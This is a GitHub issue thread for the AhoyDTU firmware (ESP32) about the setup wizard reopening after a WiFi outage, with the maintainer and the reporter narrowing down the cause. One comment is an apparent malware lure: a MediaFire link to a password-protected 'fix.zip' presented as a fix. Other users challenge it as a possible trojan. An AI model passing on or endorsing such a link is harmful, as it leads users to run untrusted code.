lumapu/ahoy #1742: setup wizard starts

Peertje-62, 2024-08-28:
### Platform

ESP32

### Assembly

the DTU was already assembled

### nRF24L01+ Module

nRF24L01+ plus

### Antenna

external antenna

### Power Stabilization

board

### Connection picture

- [ ] I will attach/upload an image of my wiring

### Version

0.8.141 

### Github Hash

85f8540

### Build & Flash Method

ESP Tools (flash)

### Setup

opendtufusion ; 2x hm; mqtt; interval 60 sec
(boots every 24 hour 00:00)

### Debug Serial Log output

```shell
-
```

### Error description

When opening the web interface with ip adress, ore ahoy DTU index in the menu
the setup wizard starts.
(stop wizzard goes back to normal gui)
was running okay since 21/08/2024

LC-JiaZhaorong, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knickohr, 2024-08-28:
Was ist das ?  Ein Virus, ein Backdood ?  Trojaner ?

Bitte, wenn ihr Lösungen anbietet diese über einen Pull Re Request einkippen und nicht einfachnDateien downloaden und ausführen 😵

Gubi2023, 2024-08-28:
> Was ist das ? Ein Virus, ein Backdoor ? Trojaner ?
> 
> Bitte, wenn ihr Lösungen anbietet diese über einen Pull Request einkippen und nicht einfach Dateien downloaden und ausführen 😵

danke, hab mich auch gefragt, was das soll.. Ist aber im falschen issue gelandet(?) 1741

lumapu, 2024-08-28:
@Peertje-62 could it be that your station WiFi was not avail during this period? Once one client connects to AhoyDTU AP the Setup-Wizard starts. 
I already prepare some new wizard in background, which will the turned off by setting, so it appears only once. I'm currently testing this really well because the user expierence should be good from the first touch with Ahoy.

Peertje-62, 2024-08-28:
Hi,
I indeed rebooted my router, but the aforementioned effect occurred after WiFi was online again. I was also able to reach the DTU via the set IP address in my case: 192.168.2.203 (so not via 192.168.4.1 AP!,
When I clicked Stop Wizard the normal GUI appeared, 
Hope this helps
kind regards

Peertje-62, 2024-08-28:
Hi again
can reproduce phenomenon WiFi off/ WiFi on. switch between Ahoy DTU & settings then again Ahoy DTU I enter the wizard again and it remains that way until I reboot the DTU 
[image]

lumapu, 2024-08-29:
thank you for describing how to reproduce.